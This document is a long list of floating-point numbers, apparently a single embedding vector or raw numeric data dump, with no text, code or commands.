-0.015592876821756363, 0.017056014388799667, -0.020288854837417603, 0.011391578242182732, -0.00063054304337129, 0.045482706278562546, -0.00043850610381923616, 0.010325578041374683, 0.0018428578041493893, 0.03882194310426712, 0.008771863766014576, -0.006162600126117468, -0.0035150160547345877, 0.029931634664535522, 0.009308348409831524, 0.011781749315559864, 0.02630862407386303, -0.008541942574083805, -0.006890685763210058, 0.01414367277175188, 0.01899293251335621, 0.011983801610767841, -0.008381693623960018, -0.017752747982740402, -0.009496466256678104, -0.004601919092237949, -0.044172849506139755, -0.0049502854235470295, -0.01772487908601761, 0.02647584117949009, 0.020985586568713188, 0.008381693623960018, -0.007712830323725939, -0.024162687361240387, -0.0050269258208572865, 0.03363825008273125, 0.003926088567823172, 0.009412857703864574, 0.001320308307185769, -0.01606665551662445, -0.02901194803416729, 0.030349673703312874, 0.02591845393180847, 0.010102623142302036, 0.0177666824311018, 0.008604648523032665, -0.024288099259138107, 0.04464662820100784, 0.00554947555065155, -0.015662549063563347, 0.010353446938097477, 0.008151771500706673, -0.006065057590603828, -0.03480876237154007, 0.021222475916147232, 0.008646451868116856, 0.0158576350659132, 0.022086424753069878, 0.020121637731790543, 0.023117588832974434, -0.018449479714035988, 0.02364710532128811, 0.030767712742090225, -0.012185853905975819, -0.0022190934978425503, -0.0002841362729668617, 0.023187262937426567, 0.006737404502928257, -0.0010694846278056502, 0.013419070281088352, -0.028259476646780968, -0.01801750622689724, -0.004284905735403299, 0.003974859602749348, 0.03152018412947655, 0.026963552460074425, -0.005302135366946459, 0.009113263338804245, 0.0003599059418775141, -0.00995630957186222, -0.00266500236466527, -0.030043112114071846, -0.016164196655154228, 0.00479003693908453, 0.0028931822162121534, -0.02803652174770832, -0.023995472118258476, -0.0001652562787057832, -0.029457855969667435, -0.01186535693705082, 0.018714237958192825, 0.0017461861716583371, 0.003478437662124634, 0.018115049228072166, 0.022490529343485832, -0.00989360362291336, -0.016512563452124596, 0.0499139279127121, -0.01928555965423584, 0.03032180480659008, 0.009252609685063362, -0.014101868495345116, 0.005145370494574308, 0.02867751568555832, 0.012952259741723537, -0.044813841581344604, -0.026211081072688103, -0.02570943348109722, -0.017404381185770035, -0.009775158949196339, -0.016038784757256508, -0.024929093196988106, -0.013537514954805374, 0.017697008326649666, -0.016428954899311066, 0.021891338750720024, -0.017404381185770035, 0.004236134234815836, -0.039518676698207855, 0.0008395628537982702, 0.003762356238439679, -0.001165285357274115, 0.0021546457428485155, -0.017111754044890404, 0.014868274331092834, 0.01882571540772915, 0.03327595070004463, 0.007636189926415682, -0.004075885750353336, 0.012095279060304165, -0.015369921922683716, 0.0016190324677154422, 0.009238675236701965, -0.00361604243516922, 0.014561711810529232, 0.012819880619645119, -0.007719797547906637, -0.030907059088349342, -0.008465301245450974, 0.04358759522438049, -0.004901513922959566, -0.01199076883494854, -0.024511054158210754, -0.003544627223163843, 0.03283004090189934, 0.018449479714035988, -0.004779586102813482, -0.002659776946529746, -0.010095655918121338, -0.012109213508665562, -0.026029931381344795, 0.016094524413347244, -0.012109213508665562, -0.0031300713308155537, -0.020623285323381424, -0.009886636398732662, -0.0024925610050559044, -0.013676861301064491, -0.0002471223706379533, -0.0006997808231972158, 0.03408415988087654, -0.011649370193481445, 0.017529793083667755, -0.009266544133424759, 0.02655944786965847, -0.0018132467521354556, 0.0066990843042731285, -0.00805422943085432, 0.05297955125570297, 0.002929760841652751, -0.0177666824311018, 0.0452597513794899, 0.010221067816019058, 0.021961012855172157, 0.006476129870861769, -0.004020147491246462, 0.005016474984586239, -0.009092360734939575, 0.02304791659116745, 0.000292845448711887, 0.013168246485292912, 0.012332167476415634, -0.00186375982593745, -0.026489775627851486, 0.015955178067088127, 0.00700913043692708, -0.00016242580022662878, -0.034279245883226395, 0.00006902007589815184, 0.004706428851932287, 0.009329250082373619, -0.034613676369190216, 0.008541942574083805, -0.00004183117562206462, 0.0052359458059072495, -0.016554366797208786, 0.0006928135408088565, -0.02246266044676304, -0.012220690958201885, 0.008911210112273693, 0.018686369061470032, -0.021222475916147232, -0.02465040050446987, 0.005608697887510061, 0.01091083325445652, 0.008207510225474834, -0.029569333419203758, 0.016247805207967758, -0.00589784188196063, -0.028621776029467583, 0.04985818639397621, 0.019299494102597237, -0.007559549063444138, 0.005131436046212912, 0.010109590366482735, 0.02123641036450863, 0.00995630957186222, -0.007601352874189615, -0.0010825482895597816, -0.004176912363618612, -0.0024873355869203806, 0.012199788354337215, -0.009078426286578178, 0.0030621399637311697, -0.02541680634021759, -0.037484217435121536, -0.012785043567419052, 0.02926276996731758, 0.015021556057035923, 0.003008143277838826, 0.0010355188278481364, 0.019466709345579147, -0.02884473092854023, 0.02194707840681076, 0.02859390713274479, -0.010576401837170124, -0.05141886696219444, 0.010207133367657661, 0.003203228348866105, -0.003429666394367814, 0.021152803674340248, -0.010855094529688358, -0.0004946801927872002, 0.016345348209142685, 0.020079834386706352, 0.011245264671742916, -0.0073017580434679985, -0.0038773170672357082, 0.02329874038696289, -0.005378775764256716, -0.006235756911337376, 0.011753879487514496, -0.015133032575249672, 0.006974293850362301, 0.017348643392324448, -0.023103654384613037, 0.009712453000247478, 0.03294152021408081, 0.01658223755657673, 0.03188248723745346, -0.0008129999041557312, -0.014673189260065556, -0.0031527152750641108, -0.013495711609721184, -0.0126875014975667, -0.04283512383699417, 0.004713396076112986, -0.02325693517923355, 0.01598304696381092, -0.0020762633066624403, 0.025193851441144943, 0.009301381185650826, -0.022406920790672302, -0.040326885879039764, 0.00009307912841904908, 0.011530925519764423, -0.03363825008273125, 0.0006444776663556695, 0.028649646788835526, -0.0091968709602952, -0.01399735826998949, 0.009378021582961082, 0.0042883893474936485, -0.021626580506563187, -0.007559549063444138, -0.0005190658266656101, -0.010095655918121338, 0.00047334274859167635, 0.03709404543042183, 0.026531578972935677, -0.008172674104571342, 0.0009205579990521073, 0.007110156584531069, 0.02038639783859253, -0.029875895008444786, -0.0035341763868927956, -0.009245642460882664, -0.05049918219447136, -0.013237920589745045, -0.017028145492076874, 0.019174082204699516, -0.0008151771617121994, -0.005856037605553865, -0.014492038637399673, 0.010248936712741852, -0.0070927380584180355, 0.018115049228072166, 0.010060818865895271, -0.009663681499660015, 0.039184242486953735, 0.004142075311392546, -0.03308086469769478, 0.005441481713205576, -0.0006714760675095022, 0.04085640236735344, 0.007838241755962372, 0.006845398340374231, 0.004974671173840761, -0.00034727767342701554, 0.0064900643192231655, -0.010924767702817917, 0.024845486506819725, 0.020748697221279144, 0.01644289121031761, -0.03784651681780815, 0.0325792171061039, 0.01700027659535408, -0.02884473092854023, -0.006308914162218571, -0.01847735047340393, 0.024051209911704063, -0.036731746047735214, 0.0088833412155509, -0.007489875890314579, -0.015537138096988201, 0.008332922123372555, -0.017362577840685844, 0.011224362999200821, 0.00201355735771358, 0.01217888668179512, -0.025653695687651634, -0.01370473112910986, 0.011050179600715637, 0.0009702002280391753, 0.02774389460682869, 0.0004334983532316983, 0.010262872092425823, -0.0014500748366117477, -0.02123641036450863, 0.013648992404341698, -0.0021703222300857306, -0.0030900093261152506, -0.02080443687736988, 0.017278969287872314, -0.0016477727331221104, -0.001544133760035038, -0.002992466790601611, 0.0017461861716583371, -0.0017435734625905752, -0.015801895409822464, 0.00545541662722826, 0.00016438536113128066, -0.007531679701060057, 0.02876112423837185, -0.02021918073296547, -0.010325578041374683, 0.026670925319194794, -0.016428954899311066, -0.01700027659535408, 0.007887013256549835, -0.012046507559716702, 0.005925711244344711, -0.011823552660644054, 0.01911834441125393, -0.012771109119057655, 0.011252231895923615, -0.010207133367657661, 0.003159682499244809, 0.023145457729697227, 0.0020274920389056206, -0.019522449001669884, -0.006239240989089012, -0.011314937844872475, 0.022852830588817596, -0.006253175437450409, -0.0010973538737744093, -0.01780848577618599, 0.004553147591650486, 0.011398546397686005, -0.017836354672908783, -0.019480643793940544, 0.010290740989148617, 0.005852553993463516, -0.006514450069516897, 0.014046129770576954, -0.006169567350298166, -0.003577722003683448, -0.005967515055090189, 0.003668297315016389, 0.002220835303887725, 0.036257967352867126, -0.0022905084770172834, 0.01186535693705082, -0.005758495070040226, -0.003149231430143118, -0.03645305335521698, 0.009635812602937222, 0.0060058352537453175, 0.009405890479683876, -0.01021410059183836, 0.018463414162397385, 0.026155343279242516, -0.005800299346446991, 0.004877128638327122, 0.006897652987390757, 0.02435777336359024, 0.0061869858764112, 0.003936539404094219, 0.015314183197915554, -0.005863005295395851, 0.018574891611933708, 0.011119852773845196, -0.012903488241136074, 0.01577402651309967, 0.007594385650008917, -0.00008899670501705259, 0.03394481539726257, -0.0019961390644311905, -0.00009487538773100823, -0.005768946371972561, 0.036397311836481094, -0.01708388514816761, 0.011684206314384937, -0.0022225771099328995, 0.0014108836185187101, 0.002537848660722375, -0.004953769035637379, 0.007078803610056639, 0.00811693537980318, -0.02508237585425377, 0.015091229230165482, -0.025597957894206047, 0.003528950735926628, -0.013265789486467838, 0.001718316925689578, -0.0031980029307305813, -0.020316723734140396, 0.007684960961341858, 0.012025604955852032, -0.009398923255503178, -0.008242347277700901, 0.00123670045286417, -0.005333488341420889, 0.010255904868245125, 0.004159493837505579, 0.018547022715210915, 0.004176912363618612, 0.004110722802579403, -0.013669894076883793, 0.013147344812750816, -0.02749307081103325, -0.01644289121031761, 0.0215708427131176, -0.02215609885752201, -0.009949342347681522, -0.017878159880638123, -0.009350151754915714, 0.009635812602937222, 0.010687878355383873, 0.009754257276654243, 0.013251855038106441, -0.019090473651885986, -0.0038564151618629694, 0.0006105119828134775, -0.007078803610056639, 0.021417561918497086, 0.022532332688570023, 0.027771763503551483, 0.007252987008541822, -0.010381316766142845, -0.005222011357545853, 0.0035306925419718027, -0.03269069641828537, 0.015746157616376877, 0.005619148723781109, -0.013920717872679234, -0.006340267136693001, 0.016247805207967758, -0.002867054892703891, -0.01602485030889511, 0.002018782775849104, 0.017627336084842682, -0.008472268469631672, 0.01683306135237217, 0.008709157817065716, -0.015927307307720184, -0.007239052094519138, -0.007664058823138475, -0.012931358069181442, 0.013913750648498535, -0.034028422087430954, -0.012868652120232582, 0.0016599654918536544, -0.0003609945997595787, -0.0027224828954786062, -0.0268520750105381, -0.013126443140208721, -0.018170787021517754, -0.0030273033771663904, -0.002295734127983451, -0.0006170438718982041, 0.008980883285403252, 0.008806700818240643, 0.007907915860414505, 0.031993962824344635, -0.014965817332267761, 0.006740888115018606, -0.006396005861461163, 0.0016817384166643023, 0.046374525874853134, -0.006145182065665722, -0.03377759829163551, -0.012589958496391773, 0.01433875784277916, -0.025820910930633545, 0.0009614910231903195, 0.0039539579302072525, -0.015300248749554157, 0.016610106453299522, 0.016178131103515625, -0.004828357137739658, -0.007719797547906637, -0.028259476646780968, 0.00596403144299984, -0.0020588450133800507, -0.02223970554769039, 0.007117123808711767, -0.004434703383594751, -0.005713207647204399, 0.02111099846661091, 0.002898407867178321, 0.025026636198163033, -0.01192806288599968, 0.016721583902835846, 0.021501168608665466, 0.02757667750120163, -0.007503810338675976, 0.009169001132249832, 0.02308971993625164, 0.008207510225474834, 0.01577402651309967, -0.011921095661818981, -0.014157607220113277, 0.004845775663852692, -0.014979751780629158, 0.013237920589745045, 0.014185476116836071, -0.005277749616652727, 0.00751774525269866, 0.005180207081139088, -0.003541143611073494, 0.0022173516917973757, 0.016303543001413345, -0.002497786423191428, 0.018296198919415474, -0.00593267846852541, 0.017752747982740402, -0.011941997334361076, -0.019229819998145103, -0.01211618073284626, -0.021124932914972305, 0.0009031397057697177, -0.0104649243876338, 0.015843700617551804, 0.008966948837041855, -0.005162789020687342, 0.012966194190084934, 0.022476594895124435, 0.023911863565444946, -0.007538647390902042, -0.010687878355383873, 0.006671214941889048, 0.014248182065784931, -0.01420637872070074, 0.009858766570687294, 0.013899816200137138, 0.0033913461957126856, -0.000029747217922704294, 0.018797846511006355, -0.013537514954805374, -0.004211748950183392, -0.015049424953758717, -0.0024455315433442593, 0.012471513822674751, -0.009120230562984943, 0.01864456571638584, -0.002501270268112421, -0.004462572745978832, -0.01733470894396305, -0.008695223368704319, 0.010708780959248543, 0.01262479554861784, -0.020038031041622162, -0.00469249440357089, -0.021807732060551643, 0.01797570288181305, -0.0036613300908356905, -0.01936916820704937, -0.021264279261231422, -0.002255671890452504, 0.022615941241383553, 0.0019769789651036263, 0.001286342623643577, 0.007113640196621418, -0.014492038637399673, -0.02097165212035179, 0.005162789020687342, -0.02292250469326973, 0.00004487937985686585, 0.011551827192306519, 0.006357685197144747, 0.011050179600715637, -0.014171541668474674, 0.01569041982293129, -0.010492793284356594, 0.0017906029243022203, 0.00039365392876788974, 0.0018724689725786448, 0.011886258609592915, -0.02795291319489479, -0.008033327758312225, 0.007204215507954359, 0.014924013055860996, 0.011349774897098541, 0.022392986342310905, 0.01408096682280302, -0.03230052441358566, -0.0019020801410079002, -0.0064726462587714195, -0.015871569514274597, -0.011642402037978172, 0.0011687689693644643, 0.016470760107040405, -0.003936539404094219, 0.001860276097431779, 0.017474055290222168, -0.009433760307729244, -0.000022262785932980478, 0.01970359869301319, -0.010869028978049755, -0.010959604755043983, -0.0012994064018130302, 0.012025604955852032, 0.026615187525749207, 0.014882208779454231, -0.00026737115695141256, 0.00643780967220664, -0.0002530010533519089, -0.0030778164509683847, -0.0019160147057846189, 0.014408431015908718, -0.02643403597176075, 0.008611615747213364, -0.009635812602937222, 0.007057901471853256, -0.011621500365436077, 0.0044068340212106705, -0.015077294781804085, -0.004354578908532858, -0.009364087134599686, -0.012171919457614422, 0.005566893611103296, 0.0005843844846822321, 0.03745634853839874, 0.012840782292187214, -0.004838807974010706, -0.0221979022026062, 0.019633926451206207, 0.022643810138106346, 0.004518311005085707, -0.005650501698255539, -0.002252188278362155, -0.010687878355383873, 0.010966571979224682, 0.026503710076212883, 0.027757829055190086, -0.001437881961464882, 0.015119098126888275, -0.02144543081521988, 0.023633170872926712, -0.008033327758312225, 0.003497597761452198, 0.017278969287872314, -0.004769134800881147, 0.0044068340212106705, 0.0062044039368629456, 0.014603516086935997, -0.010541564784944057, 0.0015450046630576253, 0.005500704050064087, 0.004518311005085707, 0.03288578242063522, -0.01637321710586548, 0.007608320564031601, 0.0023758583702147007, -0.003133554942905903, 0.0020605868194252253, -0.0009179452317766845, 0.0008269345271401107, 0.014924013055860996, -0.0085628442466259, 0.010221067816019058, 0.004849259275943041, -0.011071081273257732, -0.010485826060175896, 0.007657091598957777, 0.018463414162397385, 0.008709157817065716, 0.015718288719654083, 0.0033164473716169596, 0.011872324161231518, 0.012596925720572472, 0.006887202151119709, -0.002875763922929764, 0.007475941441953182, -0.02237905189394951, -0.001416109036654234, 0.0042709712870419025, -0.006918555125594139, -0.011105918325483799, 0.01040221843868494, 0.01520270574837923, 0.0029402116779237986, -0.015996981412172318, -0.024845486506819725, 0.012318233028054237, -0.007141509559005499, -0.005065246485173702, 0.0024124367628246546, 0.010109590366482735, -0.011280101723968983, 0.005716691259294748, -0.0123739717528224, -0.025639761239290237, -0.005333488341420889, 0.008395628072321415, -0.008165706880390644, -0.0247479435056448, 0.013781371526420116, -0.006514450069516897, -0.023438086733222008, 0.006643345579504967, 0.0048004877753555775, 0.003946990240365267, -0.01564861461520195, 0.01700027659535408, -0.000925783475395292, 0.0060371882282197475, -0.005730626173317432, -0.004016663879156113, -0.0024333386681973934, 0.00421871617436409, -0.012206755578517914, 0.021501168608665466, 0.007448072079569101, 0.018714237958192825, 0.0013838851591572165, 0.005908292718231678, -0.0010677428217604756, 0.007406267803162336, -0.021250344812870026, -0.0026963553391397, 0.01230429857969284, 0.022769222036004066, 0.006315881386399269, -0.002010073745623231, -0.009747290052473545, -0.0023688909132033587, 0.020079834386706352, -0.01970359869301319, 0.0012811170890927315, -0.02242085710167885, 0.012234625406563282, -0.0022539300844073296, 0.004570566117763519, 0.01644289121031761, 0.018045375123620033, -0.004190846811980009, -0.002771254163235426, -0.03642518073320389, -0.010318610817193985, -0.013335462659597397, -0.01357235200703144, 0.017097819596529007, 0.022211836650967598, 0.008353824727237225, -0.0028008650988340378, 0.00707183638587594, 0.005145370494574308, -0.0321333110332489, -0.010269839316606522, 0.004769134800881147, 0.005793332122266293, -0.01941097155213356, 0.010144427418708801, -0.019174082204699516, 0.012067409232258797, 0.014701059088110924, 0.01780848577618599, -0.015718288719654083, -0.014283019118010998, -0.0004315387923270464, 0.007684960961341858, -0.017878159880638123, -0.0376514308154583, -0.0004128140863031149, 0.011503055691719055, 0.02308971993625164, -0.005166272632777691, -0.016902733594179153, -0.01932736299932003, 0.003978343214839697, 0.015244510024785995, -0.01751585863530636, -0.012987096793949604, -0.010241969488561153, -0.0024159203749150038, 0.012652664445340633, 0.02076263353228569, -0.01737651228904724, 0.015565006993710995, -0.014924013055860996, 0.002891440410166979, 0.005911776330322027, 0.004382448270916939, 0.0008330309647135437, -0.003894735360518098, 0.006072024814784527, -0.009837864898145199, 0.00735749676823616, 0.013600220903754234, -0.0019891716074198484, -0.019982291385531425, -0.005319553893059492, 0.00019301672000437975, 0.011760846711695194, 0.021919209510087967, -0.017028145492076874, 0.002954146359115839, -0.008486203849315643, -0.00735749676823616, -0.03519893437623978, -0.0064726462587714195, -0.009677615948021412, -0.006253175437450409, 0.007218149956315756, 0.0006418649572879076, -0.013028900139033794, -0.005497220437973738, 0.001080806483514607, -0.012325200252234936, 0.0253750029951334, 0.0021598711609840393, 0.010680911131203175, -0.018742108717560768, -0.016164196655154228, 0.0033129637595266104, -0.02042820118367672, -0.012088310904800892, 0.009461629204452038, 0.0021476782858371735, 0.017919963225722313, -0.027353722602128983, -0.0006144311046227813, -0.02237905189394951, 0.01793389767408371, 0.021501168608665466, 0.02267168089747429, -0.00361604243516922, -0.003034270601347089, 0.004340644460171461, 0.0003239806683268398, 0.016178131103515625, 0.007921850308775902, -0.0027573194820433855, -0.008284150622785091, -0.014645320363342762, 0.009719420224428177, 0.0149100786074996, -0.008277183398604393, -0.012109213508665562, 0.01818472146987915, -0.018630631268024445, -0.007148476783186197, -0.0145895816385746, -0.01589943841099739, -0.01759946718811989, 0.0012036056723445654, -0.018031440675258636, -0.016651909798383713, -0.013976456597447395, -0.004737781826406717, 0.0008225799538195133, -0.04447941109538078, -0.02605780027806759, 0.021431496366858482, 0.010541564784944057, 0.023633170872926712, -0.008604648523032665, 0.0008953014621511102, 0.01560681127011776, 0.03650879114866257, -0.0008609002688899636, -0.006545803043991327, 0.0034070226829499006, 0.002482109935954213, 0.003192777279764414, -0.002168580424040556, -0.00694642448797822, 0.010290740989148617, 0.003751905169337988, -0.02550041489303112, -0.0037728073075413704, 0.022476594895124435, -0.021459365263581276, -0.009113263338804245, -0.00209368159994483, 0.014178508892655373, 0.0020692958496510983, 0.0003392217040527612, 0.002659776946529746, 0.006556254345923662, 0.0009292671456933022, -0.01720929704606533, 0.020065899938344955, 0.012582991272211075, 0.009447694756090641, -0.023368412628769875, -0.007852177135646343, -0.017738813534379005, -0.0005129693890921772, 0.0007816469296813011, 0.016944536939263344, -0.004135108087211847, 0.0026719695888459682, -0.003668297315016389, 0.0020083319395780563, 0.00447302358224988, 0.0006396876415237784, -0.005911776330322027, 0.01350964605808258, 0.0030151105020195246, -0.0066224439069628716, -0.02076263353228569, -0.0063646528869867325, 0.02186346985399723, 0.002948920940980315, -0.0047238473780453205, -0.00341050629504025, -0.02296430803835392, -0.007239052094519138, 0.0016939311753958464, 0.007252987008541822, -0.000716328271664679, -0.01635928265750408, -0.02766028605401516, -0.02063722163438797, 0.0007829532842151821, 0.00003788483809330501, 0.02288069948554039, 0.00875096209347248, 0.000012716731362161227, 0.012422743253409863, -0.022532332688570023, -0.020400332286953926, 0.0005308231920935214, 0.008841536939144135, 0.01666584424674511, 0.005079180933535099, -0.020790502429008484, -0.00024015503004193306, 0.0005647888756357133, 0.023883994668722153, 0.00780340563505888, -0.005943129304796457, -0.008123902603983879, -0.00298201572149992, -0.003358251415193081, 0.008144804276525974, 0.00021010843920521438, -0.008465301245450974, 0.005504187662154436, -0.016484694555401802, -0.0030551727395504713, -0.005019958596676588, 0.03544975817203522, -0.003398313419893384, 0.010074754245579243, 0.018156852573156357, 0.007671026512980461, 0.0008996560354717076, 0.013147344812750816, -0.010945669375360012, -0.006326332222670317, 0.0019247239688411355, 0.005605214275419712, -0.0028008650988340378, -0.0006688633584417403, -0.010729682631790638, -0.008848504163324833, 0.0020118155516684055, -0.017390446737408638, -0.001127835945226252, -0.0021981915924698114, 0.0011609307257458568, 0.014241214841604233, 0.026029931381344795, -0.0107854213565588, 0.008507105521857738, -0.01822652667760849, 0.013286691159009933, 0.0012715370394289494, 0.0012602151837199926, -0.0044660563580691814, 0.009273511357605457, 0.026838140562176704, -0.01818472146987915, 0.010353446938097477, 0.012123147957026958, 0.011210428550839424, 0.0011591889197006822, -0.013725632801651955, -0.015565006993710995, -0.007005646824836731, -0.020581481978297234, 0.0298201572149992, 0.0001016249880194664, 0.012081343680620193, -0.00241069495677948, -0.0003910411905962974, 0.012318233028054237, 0.005340455565601587, -0.011071081273257732, 0.027311919257044792, -0.0025587505660951138, 0.007482908666133881, 0.026113539934158325, -0.00710667297244072, 0.013962522149085999, -0.003246774198487401, 0.0015319408848881721, -0.005796815734356642, -0.007343561854213476, -0.005650501698255539, -0.007343561854213476, -0.002675453433766961, -0.04559418559074402, 0.006521417293697596, 0.001820213976316154, -0.014136705547571182, 0.0074550393037498, 0.007089254446327686, 0.025152048096060753, -0.01503549050539732, 0.010673943907022476, -0.0015328117879107594, -0.017738813534379005, 0.02026098594069481, 0.003703133901581168, 0.0010555499466136098, 0.012826847843825817, -0.0025430740788578987, 0.007315692491829395, -0.0008334664162248373, 0.013990391045808792, 0.006347234360873699, -0.004591468255966902, 0.0014343983493745327, -0.008667354471981525, -0.0003104814968537539, 0.0007045709062367678, 0.0044974093325436115, -0.000014696704056404997, -0.0007263437728397548, -0.0017435734625905752, -0.008158739656209946, 0.021375756710767746, 0.013934653252363205, 0.018421610817313194, -0.009127197787165642, -0.007489875890314579, -0.012039540335536003, -0.007935784757137299, 0.023716779425740242, 0.002886214992031455, 0.005194141995161772, -0.024134818464517593, 0.006841914728283882, -0.0069673266261816025, -0.004654174204915762, -0.01674945279955864, 0.00003587084574974142, -0.02152903936803341, -0.03882194310426712, 0.0038598987739533186, 0.022295445203781128, -0.00003812978320638649, -0.0019177566282451153, -0.017697008326649666, 0.014492038637399673, 0.02693568356335163, 0.02639223262667656, 0.004706428851932287, -0.008953014388680458, -0.0024019856937229633, 0.012826847843825817, 0.0010085204849019647, -0.01594124361872673, 0.0019282075809314847, -0.007524712476879358, 0.01171207521110773, 0.015746157616376877, 0.0029802739154547453, 0.007761601824313402, -0.008353824727237225, -0.009120230562984943, -0.009900570847094059, -0.0010607754811644554, 0.003276385134086013, 0.004264003597199917, 0.013969489373266697, 0.01991261914372444, -0.0016721583670005202, -0.011085016652941704, 0.005228978581726551, -0.0068175289779901505, -0.016219936311244965, -0.017390446737408638, -0.017320772632956505, -0.02423236146569252, 0.019006866961717606, 0.008674321696162224, 0.0019125310936942697, -0.00710318936035037, 0.012443644925951958, 0.012206755578517914, 0.007859144359827042, -0.0005504188011400402, -0.005472834687680006, 0.00656670518219471, 0.014826470986008644, 0.006632894743233919, 0.010207133367657661, -0.00688371853902936, -0.0029837575275450945, 0.01619206741452217, -0.009440727531909943, -0.006988228298723698, 0.03517106547951698, -0.0034488264936953783, -0.016568301245570183, 0.008465301245450974, 0.0025761688593775034, 0.015369921922683716, 0.021556908264756203, -0.014756796881556511, -0.014436299912631512, 0.0032101955730468035, 0.009371054358780384, 0.011189525946974754, 0.008876373991370201, -0.0008134353556670249, 0.011691173538565636, 0.010457957163453102, 0.018895389512181282, 0.006315881386399269, -0.009621878154575825, -0.008911210112273693, -0.007002163212746382, 0.008507105521857738, -0.007977589033544064, 0.012471513822674751, -0.016275674104690552, 0.006942940875887871, 0.010297708213329315, 0.018895389512181282, -0.022476594895124435, 0.006061573978513479, -0.0001310728257521987, 0.030600497499108315, -0.008409562520682812, -0.001450945739634335, -0.004650690592825413, -0.021222475916147232, 0.0012906972551718354, 0.008521039970219135, -0.0021198091562837362, -0.010485826060175896, -0.016219936311244965, -0.019592121243476868, -0.015119098126888275, -0.003643911797553301, 0.009217772632837296, 0.002910600509494543, 0.0228388961404562, 0.0123739717528224, -0.004326709546148777, 0.014192444272339344, -0.010827225632965565, -0.015342053025960922, 0.006671214941889048, 0.025988128036260605, -0.008737027645111084, 0.0008500138064846396, -0.023061851039528847, -0.004570566117763519, -0.0101513946428895, 0.025653695687651634, 0.012541187927126884, 0.013969489373266697, 0.012248559854924679, 0.011593631468713284, 0.012833815068006516, -0.00016580059309490025, 0.008089065551757812, 0.010325578041374683, 0.001659094588831067, 0.014798601157963276, -0.012387906201183796, -0.00995630957186222, 0.006479613482952118, 0.025152048096060753, -0.005974482279270887, 0.008911210112273693, -0.026169277727603912, -0.02359136752784252, -0.01594124361872673, -0.0025204303674399853, -0.007949719205498695, -0.017836354672908783, -0.008444399572908878, -0.011022310703992844, 0.0018167303642258048, 0.02246266044676304, -0.002515204716473818, -0.011391578242182732, -0.002792156068608165, -0.011210428550839424, 0.0069255223497748375, -0.019564252346754074, 0.027729958295822144, 0.020832305774092674, -0.0012976645957678556, -0.00786611158400774, 0.003880800912156701, 0.010137460194528103, 0.007496843114495277, -0.010736649855971336, -0.017139622941613197, 0.01945277489721775, 0.01805930957198143, -0.0005168885109014809, 0.011071081273257732, -0.021877404302358627, -0.000009559661521052476, 0.014129738323390484, 0.002010073745623231, -0.013356364332139492, -0.017710942775011063, 0.009245642460882664, 0.01097353920340538, -0.006315881386399269, -0.013098573312163353, -0.0016381925670430064, 0.02693568356335163, 0.009175969287753105, -0.012192821130156517, 0.016944536939263344, -0.018853584304451942, 0.02541680634021759, 0.033136602491140366, -0.00437896465882659, 0.016651909798383713, 0.01463138498365879, -0.008123902603983879, 0.022490529343485832, -0.005984933581203222, -0.016275674104690552, 0.01338423416018486, -0.005775913596153259, -0.0010642590932548046, 0.009942375123500824, -0.01936916820704937, -0.004267487209290266, 0.0008595939143560827, 0.0007407139055430889, 0.009733354672789574, -0.006333299912512302, -0.007259954232722521, -0.012889553792774677, 0.011774781160056591, 0.004323225934058428, -0.003978343214839697, 0.005667920224368572, -0.03177100792527199, 0.020665090531110764, 0.012694468721747398, -0.0032171630300581455, 0.008667354471981525, 0.0033721858635544777, 0.013098573312163353, -0.010374348610639572, 0.031993962824344635, -0.00279041426256299, 0.002637133002281189, -0.023911863565444946, -0.004427735693752766, -0.013474809005856514, 0.011698140762746334, -0.00021914418903179467, -0.012074376456439495, 0.008291118778288364, -0.0008365146350115538, -0.0005839490331709385, -0.0031945190858095884, 0.005619148723781109, -0.02859390713274479, 0.004034081939607859, 0.015133032575249672, -0.01103624515235424, -0.0007659704424440861, -0.020414266735315323, -0.0029645974282175303, 0.0071833133697509766, -0.009245642460882664, 0.005277749616652727, -0.025235656648874283, 0.0028409273363649845, -0.0035655293613672256, 0.006660764105618, -0.010757551528513432, 0.0015554556157439947, -0.005469351075589657, 0.02144543081521988, 0.0058107501827180386, 0.003251999616622925, 0.009566139429807663, -0.011537892743945122, 0.018978996202349663, -0.030293935909867287, -0.006625927519053221, -0.006228789687156677, 0.007531679701060057, -0.004103755112737417, -0.020247049629688263, 0.011029277928173542, 0.011948964558541775, -0.021682320162653923, -0.019090473651885986, 0.019466709345579147, 0.013558417558670044, -0.030600497499108315, -0.004702945239841938, -0.007002163212746382, 0.019633926451206207, -0.002990724751725793, -0.008911210112273693, -0.008479236625134945, 0.007873078808188438, 0.012464546598494053, 0.0145895816385746, -0.01129403617233038, -0.014366626739501953, 0.005957064218819141, -0.007120607420802116, 0.0033112219534814358, 0.032662827521562576, 0.007239052094519138, 0.006963842548429966, -0.023284804075956345, 0.003461019368842244, 0.008939079940319061, -0.007887013256549835, 0.019996225833892822, 0.0028200254309922457, 0.00013575400225818157, -0.00925957690924406, -0.010750584304332733, -0.0022504464723169804, -0.0029942085966467857, 0.007956686429679394, 0.020024096593260765, -0.013837110251188278, 0.010032949969172478, 0.005824685096740723, 0.016261739656329155, 0.010325578041374683, 0.01059730350971222, 0.014519908465445042, 0.009092360734939575, -0.000054568317864323035, 0.03388907387852669, -0.0035742383915930986, -0.00469249440357089, -0.02101345732808113, -0.009823930449783802, 0.028384888544678688, -0.0006810561753809452, 0.0003834206727333367, 0.005845586769282818, 0.011091983877122402, -0.023911863565444946, -0.0021703222300857306, 0.004901513922959566, 0.01895112730562687, -0.0030551727395504713, 0.020456070080399513, -0.002260897308588028, -0.016387151554226875, 0.006706051528453827, 0.011558794416487217, 0.014728927984833717, -0.013537514954805374, 0.0009127197554334998, 0.006765273865312338, -0.02973654866218567, -0.004849259275943041, 0.02109706401824951, -0.0037937092129141092, -0.015662549063563347, -0.006291495636105537, -0.006340267136693001, 0.006044155452400446, 0.01631747931241989, 0.02173805795609951, 0.02118067257106304, -0.004999056458473206, 0.0027729959692806005, 0.012004703283309937, -0.01670764945447445, -0.01741831563413143, 0.0015667774714529514, 0.017474055290222168, -0.02562582679092884, 0.001699156709946692, 0.0037240360397845507, 0.016484694555401802, -0.0007973234169185162, 0.008764896541833878, -0.017153557389974594, -0.002469917293637991, 0.0035376599989831448, 0.01872817426919937, 0.00831202045083046, -0.004337160848081112, 0.0053439391776919365, -0.004075885750353336, -0.0077546341344714165, -0.004079369828104973, -0.009022687561810017, 0.009092360734939575, -0.009440727531909943, 0.011085016652941704, 0.008569811470806599, 0.0005769816925749183, 0.009245642460882664, 0.0095173679292202, 0.025890585035085678, -0.0139555549249053, -0.0040305983275175095, -0.013816208578646183, -0.005281233228743076, 0.006904620677232742, 0.005821201018989086, 